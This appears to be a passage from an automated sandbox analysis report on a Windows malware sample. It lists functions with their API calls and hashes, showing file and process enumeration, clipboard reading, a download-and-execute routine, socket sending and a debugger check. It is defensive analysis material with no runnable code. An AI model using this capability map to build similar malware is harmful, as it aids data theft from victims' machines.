            • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
            • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
            • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
            Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
            Download Yara Rule
            APIs
            • __EH_prolog.LIBCMT ref: 0040784D
            • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
            • String ID:
            • API String ID: 1771804793-0
            • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
            • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
            • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
            • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
            Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
            • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
              • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
              • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
            • String ID:
            • API String ID: 1735047541-0
            • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
            • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
            • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
            • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
            Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: A%E$A%E
            • API String ID: 0-137320553
            • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
            • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
            • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
            • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
            Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
            Download Yara Rule
            APIs
            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
              • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
              • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
              • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateInfoParametersSystemValue
            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
            • API String ID: 4127273184-3576401099
            • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
            • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
            • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
            • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
            Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
            • _wcschr.LIBVCRUNTIME ref: 0044F02A
            • _wcschr.LIBVCRUNTIME ref: 0044F038
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
            • String ID:
            • API String ID: 4212172061-0
            • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
            • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
            • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
            • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
            Function 004063C6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222filenetworkCOMMON
            Download Yara Rule
            APIs
            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DownloadExecuteFileShell
            • String ID: open
            • API String ID: 2825088817-2758837156
            • Opcode ID: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
            • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
            • Opcode Fuzzy Hash: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
            • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
            Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorInfoLastLocale$_free$_abort
            • String ID:
            • API String ID: 2829624132-0
            • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
            • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
            • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
            • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
            Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 004399A4
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
            • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
            • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
            • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
            • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
            Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
            Download Yara Rule
            APIs
            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Crypt$Context$AcquireRandomRelease
            • String ID:
            • API String ID: 1815803762-0
            • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
            • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
            • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
            • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
            Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
            Download Yara Rule
            APIs
            • OpenClipboard.USER32(00000000), ref: 0040A65D
            • GetClipboardData.USER32(0000000D), ref: 0040A669
            • CloseClipboard.USER32 ref: 0040A671
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Clipboard$CloseDataOpen
            • String ID:
            • API String ID: 2058664381-0
            • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
            • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
            • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
            • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
            Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
            Download Yara Rule
            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-3916222277
            • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
            • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
            • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
            • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
            Function 0044BA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: .
            • API String ID: 0-248832578
            • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
            • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
            • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
            • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
            Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: InfoLocale
            • String ID: GetLocaleInfoEx
            • API String ID: 2299586839-2904428671
            • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
            • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
            • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
            • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
            Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$FirstNextsend
            • String ID:
            • API String ID: 4113138495-0
            • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
            • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
            • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
            • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
            Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$_free$InfoLocale_abort
            • String ID:
            • API String ID: 1663032902-0
            • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
            • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
            • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
            • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
            Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem_abort_free
            • String ID:
            • API String ID: 1084509184-0
            • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
            • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
            • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
            • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
            Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$InfoLocale_abort_free
            • String ID:
            • API String ID: 2692324296-0
            • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
            • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
            • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
            • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
            Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem_abort_free
            • String ID:
            • API String ID: 1084509184-0
            • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
            • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
            • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
            • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
            Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
            Download Yara Rule
            APIs
            • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
            • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
            • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
            • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
            Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
            • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CriticalEnterEnumLocalesSectionSystem
            • String ID:
            • API String ID: 1272433827-0
            • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
            • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
            • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
            • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
            Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem_abort_free
            • String ID:
            • API String ID: 1084509184-0
            • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
            • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
            • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
            • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
            Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
            Download Yara Rule
            APIs
            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
            • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
            • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
            • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
